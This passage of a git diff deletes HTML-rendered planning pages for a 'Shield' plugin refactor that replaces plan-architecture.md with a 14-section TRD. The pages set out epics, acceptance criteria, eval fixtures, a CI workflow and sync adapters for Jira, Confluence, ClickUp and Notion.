-<li>EPIC-1-S2 keeps <code>plan_arch_md</code>/<code>plan_arch_html</code> keys marked <code>deprecated: true</code> (P1-9)</li>
-<li>EPIC-1-S2 gets a provenance-stamp AC (P1-10)</li>
-<li><strong>New EPIC-1-S4:</strong> version bumps in marketplace.json + pyproject.toml (P1-12)</li>
-<li>EPIC-4-S3 gets a tool-and-access requirements subsection naming test tenants + credential storage (P1-13)</li>
-<li>EPIC-1-S2 gets an atomic-write AC (P1-14)</li>
-<li><code>sidecar-schema.md</code> gets a forward-compat policy paragraph (P1-15)</li>
-</ul>
-<p>P2s <strong>deferred</strong> to a follow-up review pass: rollback-trigger language in plan-architecture.md (P1-11 — needs prose addition not a story change), <code>trd_sha</code> content hash, <code>template_version</code> field, round-trip integration eval, <code>--dry-run</code> mode, troubleshooting page, magic-number defenses. See summary.md §P2 for the full list.</p>
-<hr />
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>M1</strong></td>
-<td>TRD cutover</td>
-<td><code>/plan</code> emits <code>trd.md</code> (14 sections, stable anchors, domain-aware prompting for backend/infra, atomic write, provenance stamp); <code>plan.json</code> carries optional <code>design_refs[]</code>; schema validator wired; eval coverage for both domains <strong>plus mixed</strong>; recurring CI gate in place.</td>
-<td>—</td>
-</tr>
-<tr>
-<td><strong>M2</strong></td>
-<td>Review + sync wiring</td>
-<td><code>/plan-review</code> grades against 14-section rubric (with <code>n/a — &lt;reason&gt;</code> escape) + duplication rule + stale-anchor rule; <code>/pm-sync</code> adapters forward <code>design_refs[]</code> as web links with idempotent upsert.</td>
-<td>M1</td>
-</tr>
-<tr>
-<td><strong>M3</strong></td>
-<td>Drift + duplication hardening</td>
-<td><code>last_aligned_with</code> metadata + implementation-manual lint rule.</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--trd-generation-and-storage--m1">EPIC-1 · TRD generation and storage · M1</h2>
-<h3 id="epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting--priority-high">EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting · <code>priority: high</code></h3>
-<p><em>(unchanged from plan.md — see <a href="../../../plan.md#epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting--prioritynbsphigh">plan.md EPIC-1-S1</a>)</em></p>
-<h3 id="epic-1-s2--update-plan-to-emit-trdmd-unified-backend--infra--priority-high">EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra) · <code>priority: high</code></h3>
-<p>Modify <code>shield/commands/plan.md</code> and <code>shield/skills/general/plan-docs/SKILL.md</code> so <code>/plan</code> writes <code>trd.md</code> with all 14 sections for both backend and infrastructure features. Stop emitting <code>plan-architecture.md</code>. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain from repo markers (with <code>.shield.json</code> <code>plan.template_override</code> as the manual override key) and surfaces the right per-section authoring guidance.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Replace 'Generate plan-architecture.md' with 'Generate trd.md per the unified 14-section template'.</li>
-<li>Update <code>plan-docs/SKILL.md</code> generation prompt to walk 14 sections, select domain-appropriate authoring guidance, emit explicit <code>{#section-id}</code> anchors.</li>
-<li><strong>Domain detection (P1-5):</strong> reuse existing repo-marker detection (<code>*.tf</code> / <code>atmos.yaml</code> / <code>Chart.yaml</code> → infra; <code>pom.xml</code> / <code>pyproject.toml</code> / <code>package.json</code> / <code>go.mod</code> → backend). For manual override, read <code>.shield.json</code> <code>plan.template_override</code> ∈ <code>{infra, backend, mixed}</code>. Document this in <code>shield/commands/plan.md</code>.</li>
-<li><strong>Mixed-domain handling (P0-6):</strong> when both infra and backend markers are detected (or <code>plan.template_override == &quot;mixed&quot;</code>), the generator prepends <code>[backend]</code> and <code>[infra]</code> labels to subsection bullets within each section that has divergent interpretations. Worked example: §11 APIs Involved emits a <code>### [backend] HTTP API contracts</code> subsection AND a <code>### [infra] Module interfaces &amp; cloud-API surface</code> subsection. A <code>positive-mixed/</code> eval fixture in EPIC-3-S1 demonstrates the shape.</li>
-<li><strong>Output-paths deprecation overlap (P1-9):</strong> add <code>plan_trd_md</code> (<code>{output_dir}/{feature}/trd.md</code>) and <code>plan_trd_html</code> (<code>{output_dir}/{feature}/outputs/trd.html</code>) to <code>shield/schema/output-paths.yaml</code>. Keep <code>plan_arch_md</code> and <code>plan_arch_html</code> with <code>deprecated: true</code> in the entry; remove in M3 or a follow-up PR. Mirror in <code>shield/commands/plan.md</code> outputs: frontmatter.</li>
-<li>Update render-markdown helper invocation to render <code>trd.md</code> to <code>outputs/trd.html</code>.</li>
-<li><strong>Provenance stamp (P1-10):</strong> the generator emits a top-of-file HTML comment in <code>trd.md</code>: <code>&lt;!-- generated by /plan v{plugin-version} on {YYYY-MM-DD} --&gt;</code> where <code>{plugin-version}</code> is read from <code>.claude-plugin/marketplace.json</code>.</li>
-<li><strong>Atomic write (P1-14):</strong> the generator writes <code>trd.md.tmp</code> first, then renames to <code>trd.md</code>. If any step fails (template-load error, prompt error, write error), it removes <code>trd.md.tmp</code> and surfaces the error message — never leaves a partial <code>trd.md</code> behind.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/plan</code> in a fresh feature folder writes <code>trd.md</code> and <code>outputs/trd.html</code>.</li>
-<li><code>/plan</code> no longer writes <code>plan-architecture.md</code> anywhere.</li>
-<li><code>output-paths.yaml</code> lists <code>plan_trd_md</code> and <code>plan_trd_html</code>; <code>plan_arch_md</code> and <code>plan_arch_html</code> are marked <code>deprecated: true</code>.</li>
-<li>Running <code>/plan</code> on a folder with only infra markers produces a TRD where infra interpretation dominates §4–7, §11, §14.</li>
-<li>Running <code>/plan</code> on a folder with only backend markers produces a TRD where backend interpretation dominates the same sections.</li>
-<li><strong>(P0-6)</strong> Running <code>/plan</code> on a folder with both infra and backend markers produces a TRD where divergent sections carry <code>[backend]</code> and <code>[infra]</code> labeled subsections.</li>
-<li><strong>(P1-5)</strong> Setting <code>.shield.json</code> <code>plan.template_override</code> to one of <code>{infra, backend, mixed}</code> overrides repo-marker detection.</li>
-<li><strong>(P1-10)</strong> Emitted <code>trd.md</code> carries a <code>&lt;!-- generated by /plan vX.Y.Z on YYYY-MM-DD --&gt;</code> comment as the first line after frontmatter.</li>
-<li><strong>(P1-14)</strong> Killing <code>/plan</code> mid-write (e.g., SIGTERM during generation) does not leave a corrupted <code>trd.md</code>; only <code>trd.md.tmp</code> may remain and is removed on next invocation.</li>
-</ul>
-<h3 id="epic-1-s3--update-existing-feature-behavior-on-re-run--priority-medium">EPIC-1-S3 · Update existing-feature behavior on re-run · <code>priority: medium</code></h3>
-<p><em>(unchanged from plan.md)</em></p>
-<h3 id="epic-1-s4--bump-plugin-version-per-claudemd-mandate--priority-high-new--p1-12"><strong>EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate · <code>priority: high</code></strong> <em>(new — P1-12)</em></h3>
-<p>CLAUDE.md &quot;Plugin isolation / Versioning&quot; requires bumping <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> in the same commit as any plugin update. The TRD refactor is silent on this; add the bump here.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Bump <code>.claude-plugin/marketplace.json</code> <code>version</code> field for the Shield plugin entry.</li>
-<li>Bump <code>pyproject.toml</code> version in any package modified (<code>shield/adapters/clickup/pyproject.toml</code>, plus new adapter packages from EPIC-4-S0).</li>
-<li>Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from <code>plan-architecture.md</code> to <code>trd.md</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>The M1 PR includes both version bumps in the same commit as the SKILL.md changes.</li>
-<li>CHANGELOG mentions the cutover and the schema 1.1 → 1.2 bump.</li>
-</ul>
-<hr />
-<h2 id="epic-2--story-schema-and-design-traceability--m1">EPIC-2 · Story schema and design traceability · M1</h2>
-<h3 id="epic-2-s1--extend-planjson-schema-with-optional-design_refs--priority-high">EPIC-2-S1 · Extend plan.json schema with optional design_refs[] · <code>priority: high</code></h3>
-<p>Add an optional <code>design_refs[]</code> array to each story in the <code>plan.json</code> sidecar. Shape: <code>{doc, component?, section_id, anchor_url, label}</code>. Bump sidecar schema to 1.2; preserve back-compat.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>sidecar-schema.md</code> to add <code>design_refs[]</code> field on the story record.</li>
-<li>Bump version key in schema example from <code>'1.1'</code> to <code>'1.2'</code>.</li>
-<li>Document back-compat: 1.1/1.0 sidecars without <code>design_refs[]</code> remain valid.</li>
-<li><strong>(P1-15)</strong> Add a <strong>forward-compat policy</strong> subsection to <code>sidecar-schema.md</code>: when <code>/plan-review</code> encounters <code>version &gt; current</code>, it warns but does not reject; unknown top-level keys are preserved on round-trip; unknown <code>doc</code> enum values fail validation.</li>
-<li>Add a 'design_refs[] field' subsection with per-field semantics (<code>doc ∈ {trd, lld, prd}</code>; <code>component</code> for LLD scoping; <code>anchor_url</code> stable across heading renames).</li>
-<li><strong>(P2-6)</strong> Add an inline example <code>design_refs[]</code> JSON instance (one TRD ref + one LLD placeholder).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>sidecar-schema.md</code> documents <code>design_refs[]</code> with version 1.2 and a forward-compat policy.</li>
-<li>A <code>plan.json</code> with no <code>design_refs[]</code> still validates as 1.2.</li>
-<li>A <code>plan.json</code> with <code>design_refs[]</code> populated validates as 1.2.</li>
-<li>An inline example is present in the schema doc.</li>
-</ul>
-<h3 id="epic-2-s2--populate-design_refs-when-plan-has-trd-context--priority-high">EPIC-2-S2 · Populate design_refs[] when /plan has TRD context · <code>priority: high</code></h3>
-<p>When <code>/plan</code> generates stories, populate each story's <code>design_refs[]</code> with a forward link to the TRD section it implements.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Update generation prompt: for each story, emit at least one <code>design_refs</code> entry pointing at a real <code>trd.md#{section-id}</code> anchor.</li>
-<li><strong>(P1-1) Section-ID selection heuristic:</strong> lowercase the story's <code>name</code>, tokenize on whitespace and punctuation, score each TRD section anchor slug by token-overlap count (Jaccard similarity), pick the highest-scoring slug. Tie-break by section order (lower § number wins). If no token overlaps with any slug, fall back to §7 <code>high-level-design</code>.</li>
-<li>For LLD references, emit placeholders with <code>doc='lld'</code>, <code>component=null</code>, <code>anchor_url=null</code>, <code>label='TODO: link when /lld &lt;component&gt; lands'</code>.</li>
-<li><strong>(P1-2) Re-run merge semantics:</strong> on <code>/plan</code> re-run, match existing <code>design_refs[]</code> entries by <code>(doc, section_id, component)</code> tuple. If found: replace <code>label</code> and <code>anchor_url</code> if changed, never duplicate. If a stored entry no longer has a matching TRD section (anchor deleted), preserve it but mark <code>stale: true</code>. New refs append.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A <code>/plan</code> run on a feature with <code>trd.md</code> emits at least one <code>design_refs</code> entry per story.</li>
-<li>Each story has at least one TRD <code>design_ref</code>; LLD refs are TODO placeholders.</li>
-<li><strong>(P1-1)</strong> Story name &quot;Implement POST /users endpoint&quot; resolves to <code>section_id: &quot;api-create-user&quot;</code> if that anchor exists, else <code>high-level-design</code>.</li>
-<li><strong>(P1-2)</strong> Running <code>/plan</code> twice on the same plan does not duplicate <code>design_refs[]</code> entries — verified by an eval fixture.</li>
-<li><strong>(P1-2)</strong> Deleting a TRD section between <code>/plan</code> runs results in the matching <code>design_refs[]</code> entry being marked <code>stale: true</code> (rather than removed).</li>
-</ul>
-<h3 id="epic-2-s3--add-json-schema-validator-for-planjson--priority-high-new--p1-7"><strong>EPIC-2-S3 · Add JSON Schema validator for plan.json · <code>priority: high</code></strong> <em>(new — P1-7)</em></h3>
-<p>Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the drift inflection. Add it now.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> (preferred — already in the deps tree via clickup adapter) or <code>jsonschema</code>.</li>
-<li>Schema definition lives at <code>shield/schema/plan-sidecar.schema.json</code> (machine-readable counterpart to <code>sidecar-schema.md</code>).</li>
-<li>Validator is invoked by <code>/plan-review</code> (first check) and the eval runner (in EPIC-3).</li>
-<li>Reject unknown <code>doc</code> enum values, enforce <code>design_refs[]</code> cardinality (min 1 per story when populated), reject unknown sidecar versions newer than current.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>uv run shield/scripts/validate_plan.py &lt;path&gt;</code> exits 0 on valid sidecars and non-zero with a named error on invalid ones.</li>
-<li><code>/plan-review</code> invokes the validator before applying rubric checks and aborts on schema failure.</li>
-<li>Sidecar version forward-compat behavior matches the policy in <code>sidecar-schema.md</code> (warn on <code>&gt; current</code>, accept-with-ignored-unknown-keys).</li>
-</ul>
-<hr />
-<h2 id="epic-3--eval-coverage-for-trd-format--m1">EPIC-3 · Eval coverage for TRD format · M1</h2>
-<h3 id="epic-3-s1--author-positive-trd-eval-fixtures-backend--infra--mixed--priority-high">EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra + mixed) · <code>priority: high</code></h3>
-<p>Create <strong>three</strong> positive fixture <code>trd.md</code> files: backend, infra, <strong>and mixed</strong> (P0-6). The infra fixture uses <code>n/a — &lt;reason&gt;</code> on at least one section; the mixed fixture uses <code>[backend]</code>/<code>[infra]</code> labeled subsections on at least §11 APIs Involved.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-backend/trd.md</code> with all 14 sections (Bytebite-style fictional feature).</li>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-infra/trd.md</code> with all 14 sections (fictional terraform/atmos change). At least one section uses <code>n/a — &lt;reason&gt;</code>.</li>
-<li><strong>(P0-6)</strong> Author <code>shield/evals/plan-trd/fixtures/positive-mixed/trd.md</code> with all 14 sections for a fictional feature that has both backend code and an infra component (e.g., a new internal microservice with its own RDS instance). §11 APIs Involved demonstrates the <code>[backend]</code> / <code>[infra]</code> labeled-subsection shape.</li>
-<li>Author corresponding <code>plan.json</code> sidecars with <code>design_refs[]</code> entries pointing at fixture <code>trd.md</code> anchors.</li>
-<li>Write <code>shield/evals/plan-trd.yaml</code> with all three positive cases wired.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>All three positive fixtures pass the eval.</li>
-<li>The infra fixture uses <code>n/a — &lt;reason&gt;</code> on at least one section.</li>
-<li>The mixed fixture uses labeled subsections on at least §11.</li>
-<li>Fixtures are self-contained (no external API calls, no LLM dispatches).</li>
-</ul>
-<h3 id="epic-3-s2--author-missing-section--drift--vague-tbd-negative-fixtures--priority-high">EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures · <code>priority: high</code></h3>
-<p><strong>(P0-1, P0-4)</strong> For each of the 14 required sections, author a fixture that omits it. Add one drift-by-addition fixture (15th section). Add one vague-TBD fixture. <strong>Total: 16 negative fixtures.</strong></p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>14 missing-section fixtures under <code>shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md</code>.</li>
-<li>1 drift-by-addition fixture under <code>shield/evals/plan-trd/fixtures/extra-section/trd.md</code>.</li>
-<li>1 vague-TBD fixture under <code>shield/evals/plan-trd/fixtures/vague-tbd/trd.md</code> (§6 NFRs contains only 'TBD').</li>
-<li>Wire each into <code>shield/evals/plan-trd.yaml</code> with named <code>expected_error</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><strong>16 negative fixtures total</strong> exist and fail with the expected named errors.</li>
-<li>Drift fixture fails with 'unexpected section'; vague-TBD fails with 'vague section content'; missing-section fixtures fail with their section's slug in the error message.</li>
-</ul>
-<h3 id="epic-3-s3--wire-eval-into-recurring-ci--red-green-paper-trail--priority-high-p0-5-p1-4--renamed">EPIC-3-S3 · Wire eval into recurring CI + RED-GREEN paper trail · <code>priority: high</code> <em>(P0-5, P1-4 — renamed)</em></h3>
-<p>Wire <code>shield/evals/plan-trd.yaml</code> into a recurring CI job, not just one-shot PR-body capture. Capture RED→GREEN trail in the implementation PR.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li><strong>(P0-5)</strong> Create or extend <code>.github/workflows/eval-plan-trd.yml</code> (or wire into the existing eval workflow if one exists) that runs <code>uv run shield/evals/run.py plan-trd</code> on every PR touching <code>shield/skills/general/plan-docs/**</code>, <code>shield/schema/**</code>, or <code>shield/evals/plan-trd/**</code>.</li>
-<li>Before any <code>/plan</code> command changes: run the eval and confirm RED.</li>
-<li>After <code>/plan</code> changes land: run the eval and confirm GREEN (3 positives pass; <strong>16 negatives</strong> fail with the right named errors).</li>
-<li>Capture both runs in the implementation PR description.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A GitHub Actions workflow exists that runs the eval on PRs touching the relevant paths.</li>
-<li>The workflow fails the build if the eval reports any fixture mismatch.</li>
-<li>PR body for the M1 cutover contains both RED and GREEN sections, showing <strong>3 positives + 16 negatives</strong> behaving as expected before and after.</li>
-<li>The eval invocation is consistently <code>uv run shield/evals/run.py plan-trd</code> (no &quot;or equivalent&quot; hedge).</li>
-</ul>
-<hr />
-<h2 id="epic-4--plan-review-and-pm-sync-wiring--m2">EPIC-4 · /plan-review and /pm-sync wiring · M2</h2>
-<h3 id="epic-4-s0--scaffold-jira--confluence--notion-adapter-packages--priority-high-new--p0-2"><strong>EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages · <code>priority: high</code></strong> <em>(new — P0-2)</em></h3>
-<p>Only <code>shield/adapters/clickup/</code> exists today as a <code>uv</code> package. EPIC-4-S3 implies four adapters land in one story but three of them have no <code>pyproject.toml</code>, no <code>tests/</code>, no MCP server skeleton. Scaffold them first.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/adapters/jira/</code> with <code>pyproject.toml</code> declaring <code>requests</code> (or <code>atlassian-python-api</code>) as a dep, <code>server/</code> skeleton mirroring clickup's layout, <code>tests/</code> directory with a placeholder contract test, and <code>.mcp.json</code> entry.</li>
-<li>Same for <code>shield/adapters/confluence/</code>.</li>
-<li>Same for <code>shield/adapters/notion/</code>.</li>
-<li>Create <code>shield/adapters/_common/design_refs.py</code> exposing the <code>DesignRef</code> dataclass and the <code>forward_design_refs</code> protocol interface (see EPIC-4-S3 for shape).</li>
-<li>Update top-level pyproject if needed to add the new packages to the workspace.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Each new adapter directory has a working <code>pyproject.toml</code> resolvable by <code>uv sync</code>.</li>
-<li>Each new adapter has a placeholder contract test that runs (and may be skipped) under <code>uv run pytest shield/adapters/&lt;tool&gt;/tests/</code>.</li>
-<li><code>shield/adapters/_common/design_refs.py</code> exports <code>DesignRef</code>, <code>ForwardResult</code>, <code>ForwardError</code>, and a protocol/abstract class for <code>forward_design_refs</code>.</li>
-<li><code>.mcp.json</code> entries for the new adapters are present (even if disabled until EPIC-4-S3 lands the real logic).</li>
-</ul>
-<h3 id="epic-4-s1--add-14-section-presence-rule--stale-anchor-rule-to-plan-review--priority-high-p1-6-added">EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review · <code>priority: high</code> <em>(P1-6 added)</em></h3>
-<p>Extend <code>/plan-review</code> rubric to check 14 required sections, the <code>n/a — &lt;reason&gt;</code> escape, and <strong>stale <code>design_refs[]</code> anchors</strong>.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>TRD section presence rule (imports 14-entry slug allow-list; checks each anchor exists).</li>
-<li>TRD section content rule (accepts real content or <code>n/a — &lt;reason&gt;</code>; flags 'TBD'/empty).</li>
-<li><strong>(P1-6) Stale-anchor rule:</strong> for each story's <code>design_refs[].anchor_url</code>, parse the <code>#section-id</code> and assert it exists in the linked <code>trd.md</code>. Report mismatches as Critical findings.</li>
-<li>Eval fixtures under <code>shield/evals/plan-review-trd/</code> exercising all three rules.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>/plan-review</code> flags missing sections by slug as Critical.</li>
-<li><code>/plan-review</code> does not flag presence/content for valid TRDs (including <code>n/a — &lt;reason&gt;</code>).</li>
-<li>TBD-only sections flag as vague-content Critical.</li>
-<li><code>n/a</code> without reason flags as missing-reason.</li>
-<li><strong>(P1-6)</strong> A <code>plan.json</code> whose story <code>design_refs[].anchor_url</code> points at a non-existent anchor in <code>trd.md</code> flags as Critical with the offending anchor in the message.</li>
-</ul>
-<h3 id="epic-4-s2--add-prdtrd-duplication-detection-rule-to-plan-review--priority-medium">EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review · <code>priority: medium</code></h3>
-<p><em>(unchanged from plan.md)</em></p>
-<h3 id="epic-4-s3--pm-sync-emits-design_refs-as-web-links-with-idempotent-upsert--priority-high-p0-3-p0-4-p1-3-p1-8-added">EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert · <code>priority: high</code> <em>(P0-3, P0-4, P1-3, P1-8 added)</em></h3>
-<p>Update <code>/pm-sync</code> adapters to forward each story's <code>design_refs[]</code> entries as web links on the synced task. Use a deterministic idempotency key to prevent duplicates on re-run.</p>
-<p><strong>Adapter file paths (P1-3):</strong></p>
-<ul>
-<li><code>shield/adapters/clickup/server/tools/sync.py</code> — extend existing</li>
-<li><code>shield/adapters/jira/server/tools/sync.py</code> — new (per EPIC-4-S0)</li>
-<li><code>shield/adapters/confluence/server/tools/sync.py</code> — new</li>
-<li><code>shield/adapters/notion/server/tools/sync.py</code> — new</li>
-</ul>
-<p><strong>Adapter interface contract (P0-3):</strong>
-Each adapter exposes:</p>
-<pre><code class="language-python">def forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult: ...
-</code></pre>
-<p>where <code>ForwardResult</code> is <code>{created: int, skipped: int, errors: list[ForwardError]}</code>. <code>DesignRef</code> and <code>ForwardResult</code> are defined in <code>shield/adapters/_common/design_refs.py</code> (from EPIC-4-S0).</p>
-<p><strong>Idempotency key:</strong> each <code>DesignRef</code> produces <code>idempotency_key = sha256(story_id + anchor_url)[:32]</code>. Adapters use this as:</p>
-<ul>
-<li>Jira: the <code>globalId</code> field on <code>remote_issue_link</code></li>
-<li>Confluence: the <code>name</code> field on <code>remote_link</code></li>
-<li>ClickUp: the comparison key for URL custom field deduplication before write</li>
-<li>Notion: the comparison key for URL property deduplication before write</li>
-</ul>
-<p><strong>Observability (P1-8):</strong> each forwarded ref emits one <code>action_log</code> entry with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>action='forward_design_ref_failed'</code> with <code>{error_class, http_status, idempotency_key}</code>.</p>
-<p><strong>Tool &amp; access requirements (P1-13):</strong></p>
-<ul>
-<li><strong>Test tenants:</strong> each adapter integration test uses a free-tier sandbox tenant (Confluence Cloud free tier, Jira Cloud free tier, ClickUp free workspace, Notion free workspace) OR uses HTTP mocking via <code>responses</code> library (preferred — credential-free CI).</li>
-<li><strong>Credentials in tests:</strong> when integration tests run live, credentials come from <code>SHIELD_&lt;ADAPTER&gt;_TOKEN</code> env vars; CI defaults to mocked mode.</li>
-<li><strong>Python deps:</strong> Jira → <code>requests</code>; Confluence → <code>requests</code>; ClickUp → existing <code>httpx</code>; Notion → <code>requests</code>. All declared in each adapter's <code>pyproject.toml</code>.</li>
-</ul>
-<p><strong>Idempotency test (P0-4):</strong></p>
-<ul>
-<li>Eval fixture under <code>shield/adapters/&lt;tool&gt;/tests/test_idempotency.py</code> that runs <code>forward_design_refs</code> twice with the same input against a mocked remote and asserts the second call produces 0 <code>created</code> and N <code>skipped</code>.</li>
-</ul>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/commands/pm-sync.md</code> to describe <code>design_refs[]</code> forwarding contract and idempotency key.</li>
-<li>Implement <code>forward_design_refs</code> in each of the four adapter files above.</li>
-<li>Adapters that have no link affordance log <code>'design_refs forwarding skipped — adapter does not support web links'</code> instead of failing.</li>
-<li>Adapter eval fixtures using <code>responses</code> / <code>respx</code> HTTP mocking; <strong>plus the idempotency test from P0-4</strong>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/pm-sync</code> against each of {Confluence, Jira, ClickUp, Notion} forwards <code>design_refs[]</code> URLs on the synced task.</li>
-<li>Running <code>/pm-sync</code> with empty <code>design_refs[]</code> succeeds with no side effect.</li>
-<li>Adapter fixtures pass in <code>shield/evals/</code>.</li>
-<li><strong>(P0-4)</strong> Running <code>/pm-sync</code> twice on the same plan produces no duplicates — verified by per-adapter idempotency test.</li>
-<li><strong>(P0-3)</strong> All four adapters implement the same <code>forward_design_refs(task_id, refs) → ForwardResult</code> signature from <code>shield/adapters/_common/design_refs.py</code>.</li>
-<li><strong>(P1-8)</strong> <code>action_log</code> entries are emitted per ref with the documented fields.</li>
-</ul>
-<hr />
-<h2 id="epic-5--drift--duplication-hardening--m3">EPIC-5 · Drift + duplication hardening · M3</h2>
-<p><em>(unchanged from plan.md — EPIC-5-S1 and EPIC-5-S2 stay as drafted)</em></p>
-<hr />
-<h2 id="out-of-scope-locked">Out of scope (locked)</h2>
-<table>
-<thead>
-<tr>
-<th>Item</th>
-<th>Status</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><code>/lld &lt;component&gt;</code> command</td>
-<td>Template locked at 14 sections per <a href="https://github.com/infraspecdev/tesseract/pull/43">PR #43 sample</a>; authoring command is a separate epic. Typically backend-only.</td>
-</tr>
-<tr>
-<td>Adapter auto-creation of design-doc pages in Confluence/Notion</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Structured ClickUp/Notion relationships beyond URL fields</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Migration tool for existing <code>plan-architecture.md</code></td>
-<td>Direct cutover; files stay readable.</td>
-</tr>
-<tr>
-<td><code>trd_sha</code> content hash (vs commit SHA)</td>
-<td>Deferred (Architect P2). Worth revisiting after M3 ships if <code>last_aligned_with</code> proves insufficient.</td>
-</tr>
-<tr>
-<td><code>template_version</code> field on TRD frontmatter</td>
-<td>Deferred (Architect P2).</td>
-</tr>
-<tr>
-<td>Round-trip integration eval (<code>/plan</code> → <code>/plan-review</code> no Criticals)</td>
-<td>Deferred (Architect P2).</td>
-</tr>
-<tr>
-<td><code>--dry-run</code> mode for <code>/plan</code></td>
-<td>Deferred (SRE P2).</td>
-</tr>
-<tr>
-<td><code>plan-troubleshooting.md</code></td>
-<td>Deferred (SRE P2).</td>
-</tr>
-<tr>
-<td>Concurrent <code>/pm-sync</code> safety (single-writer note)</td>
-<td>Deferred (Backend P2).</td>
-</tr>
-<tr>
-<td>Magic-number defenses for §8 duplication threshold + §7 implementation-manual threshold</td>
-<td>Deferred (Architect P2) — keep as documented constants in EPIC-4-S2 / EPIC-5-S2 tasks.</td>
-</tr>
-<tr>
-<td>Explicit rollback-trigger statement in plan-architecture.md</td>
-<td>Deferred (SRE P1-11) — add to plan-architecture.md in a follow-up commit, not a new story.</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="next-steps">Next steps</h2>
-<p>After applying this enhanced plan (replacing <code>plan.md</code> and updating <code>plan.json</code>):</p>
-<ol>
-<li><strong>Update <code>plan.json</code></strong> to reflect the structural changes (new stories EPIC-1-S4, EPIC-2-S3, EPIC-4-S0; modified ACs/tasks on EPIC-1-S2, EPIC-2-S2, EPIC-3-S1, EPIC-3-S2, EPIC-3-S3, EPIC-4-S1, EPIC-4-S3). Bump M1 milestone exit criteria.</li>
-<li>Re-run <code>/plan-review</code> and confirm composite ≥ B+ (target: 3.0+).</li>
-<li><code>/pm-sync</code> to push updated stories.</li>
-<li><code>/implement</code> starting with <strong>EPIC-4-S0</strong> (adapter scaffolding) or <strong>EPIC-3-S1</strong> (positive eval fixtures) per the RED → GREEN trail.</li>
-</ol>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
deleted file mode 100644
index 9a372339..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
+++ /dev/null
@@ -1,411 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
